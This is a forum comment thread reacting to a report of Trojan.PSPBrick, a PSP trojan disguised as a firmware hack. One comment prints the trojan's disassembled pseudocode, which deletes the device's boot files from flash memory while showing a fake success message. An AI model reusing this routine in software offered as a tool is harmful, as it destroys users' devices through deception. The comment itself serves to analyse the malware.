First PSP Trojan Reported
Evangelion writes "PSP hackers beware! According to 1up.com today, Symantec has identified the first PSP Trojan in the wild. Known as Trojan.PSPBrick, it turns the PSP into, well, a brick. With buttons. Users have to download and install it themselves, and as a result it effectively breaks the PSP."
...I would recommend users NOT download it.
I, for one, welcome our new wooden horse overloards.
As to install a virus manually!
Hey, Microsoft just sent me a security update! Nifty!
of how much people SUCK!
Trust Your Technolust
That the Symantec page continues to instruct how to recover Windows XP? How useful... with that key info, I'll have my PS2 back up and running in no time!
They make it sound like you download something they advertise as a trojan. I RTFA, and its made out to be a program to let you run your own games.
-FL
why would someone want to do such a thing
"Users have to download and install it themselves"
Don't download and install it. It's not like they can creatively name an email attachment, and if it is turning PSP's into bricks, then you are not going to get it from another PSP.
Aside form all of that, it is interesting that there is already a virus out there at all for this handheld device. Although 'brick'ing a psp is just completely malicious, and has no effective purpose.
I give this virus a 2 out of 5 on the creative scale. (+1 for being the first)
Colonel Cranium this is Rectal Reconnaissance, we are on a collision course sir, Abort Abort!
all we can do is wait for users to install it and us geeks can have free psps to hack. com on i mean how many people will install it eh. restoring wont be too hard . all you need is an image and eeprom writer
I've been waiting for the upgraded version of my pet rock. "Pet Brick, now with buttons!".
Yeah, I heard about this. It was made by SONY and the file is called something like |\/|@d_1337_3|\/|ul873rz!.exe
Perfecting Discordia
www.stevenvansickle.com
wow...that should have your PSP working in no time
thanks for the help symantec *rolls eyes*
Does this mean that Symantec is going to begin marketing antivirus software for the PSP?
Sometimes I feel like +1 Reasonable should exist.
Now I'm really scared. Is there any way to avoid getting this virus? Any way at all?
And who would be so unethical as to pick on poor, defenseless PSP hackers? What is this world coming to?
There is a program called PSafeP for Windows that claims to check EBOOT files for suspicious code. I have yet to verify its validity (my PSP is still collecting dust). Has anyone here checked it out?
(Sorry for linking to PSPUpdates, but it's the only place I've seen this.)
It sounds like an Out and out classic virus .
Reminds Me of the Good old days when Viruses did real damage and were not company tools .
The only things certain in war are Propaganda and Death. You can never be sure which is which though
One line of thought, perpetrated mostly by the Anti-Virus companies, is: "Of course there are viruses for [insert name of system they now have a product for]!" They love to scare people into thinking viruses are everywhere, and can get onto your system no matter how careful you are. Buy our product!
The other line of thought runs along the lines of: I run [OS X | Linux | BSD], therefore I cannot get malicious software on my system!
Unfortunately, too many people forget that anyone with the slightest bit of skill can write malicious software for any system, if they combine a bit of social engineering... That's exactly what this PSP malware is. Don't think of it as some crazy, rampant virus, because it isn't. It's just like the stupid bash script above. But just remember that, if you're going to install something as root, you better trust the source, no matter how secure (or, in the case of the PSP, obscure -- in that not much software is written for it) your OS is.
I love my brick!
Aaaaaaaaah feckit!
Fed up with briiiiiick!
All you need is lurv.
They COULD have manufactured the firmware updater in the ROM, not flash/RAM/wherever. But no!
If there were a virus like this for the DS, it could totally spread like a virus. Imagine:
"Oh, COOL! I thought [game] wasn't out yet! I'll download it right away!"
Now imagine coupling this with some sort of wireless buffer-overflow exploit (that does not exist, as of yet). The horror!
Wonder what the public key field is for?
From the Symantec page, simple instructions to remove the virus:
:)
The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines.
1. Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Run a full system scan and delete all the files detected.
thanks Symantec, nothing like a clean WinXP on my PSP again
<announcer voice>
Trojan.PSPBrick... Brought to you by Nintendogs!
</announcer voice>
I WONDERED how my dead pixels got cured...
If you can read this, I forgot to post anonymously.
Wonder who wrote this trojan? Could it be a certain company that doesn't want you loading unauthorized software?
Though this trojan may be primitive, the fact that it permanently destroys* the PSP shows that PSPs are one buffer overflow away from an effective hardware destroying virus.
Imagine a place with a high concentration of WiFi-running PSPs, such as E3, GDC, etc. A virus makes a connection to another PSP, infects it remotely using said buffer overflow, does that a few times, and then 24 hours later kills it's host.
* Best I could tell, there's no way to remove it from the PSP. The "removal instructions" on Symantec's page appear to be for removing the file from the PC you downloaded it to.
until this gets ported to Linux?
I've heard of this virus affecting other handheld devices, but under the name WindowsCE...
With more and more devices being connected via the Internet. There will be a sufficent increase in worms and viruses that plague handhelds and other non-PC's. Think about how many other devices are connected to the Internet now. Cell-Phones, PSP's, XBOX's, PS2's, XBOX 360's, PS3's, Revolution's, etc. When these all are connected to the internet, users demand more functionality. With that, they get the darker side of the Internet. This PSP trojan is just the tip of the iceberg.
Lol, ironically, there is a PSP banner ad at the top my page.
i wonder who benefits the most from dead psp's...
it's not like the RIAA/MPAA hire goons to poison p2p networks...
oh wait...
Science : Proprietary , Knowledge : Open Source
Torrent? .....anyone? oh wait...
I read at -1 So you don't have to.
This is the disassembled code generated by Skylark from TOC2RTA.COM
:) ")
As you can see, 4 files are deleted from the flash memory, then a few lines of text are displayed. Without these files, the PSP cannot boot, so it's bricked.
_start:
call main()
while(1)
sceIoAssign:
syscall 0x20a8
sceIoRemove:
syscall 0x209e
main:
call FillVram(0)
call Print(1,1,0xFFFFFF,"PSP TEAM 2.0 Exploit Hack the 2.0 firmware")
call Print(1,2,0xFFFFFF,"Thank's to toc2rta for the 2.0 exploit
call sceIoAssign("flash6:", "lflash0:0,0", "flashfat2:", 0, 0, 0)
call sceIoRemove("flash6:/vsh/etc/index.dat")
call sceIoRemove("flash6:/kd/loadcore.prx")
call sceIoRemove("flash6:/kd/loadexec.prx")
call sceIoRemove("flash6:/kd/init.prx")
call Print(1,4,0xFFFFFF," Your 2.0 is hacked please reboot ")
call Print(1,5,0xFFFFFF," Thank you PSP Team the french team")
call Print(1,6,0xFFFFFF," FuCk yoshihiro and SonyxTeam Looser")
You can't flash the Nintendo DS without closing a jumper in the battery compartment. Who said Nintendo didn't know what they were doing?
wouldn't it be possible to just put the files back on, assuming that you read the code and realize that you just installed the brick, before rebooting it?
releasing the "anti-hack" could possibly even lure our whoever is responsible. . .
eg, if sony were responsible (unlikely I know) but they would probably try to sue the anti-hack maker or something. . .
Post of the Week!
Accoding to impress (sorry, in Japanese), SCEI has no intention to provide support for users whose PSP are broken due to this trojan horse, saying this happens only when they are using their PSP in an (unsupported|illegitimate|unauthorative) way.
Noone bothered to write me up a nice article when I introduced my Trojan.PSPThrowItAgainstTheWall hack :/ It made any PSP basically useless too.
Yuma, AZ...You will never find a more wretched hive of scum and villainy. We must be cautious.
When and if a exploite is found in the PSP browser that lets you run code it will only be a matter of time for this to be used.
The only good thing about that is then sony would have to fix bricked PSP's.
I also herd something a while back that Team Xcuter was making a way to reflash PSP's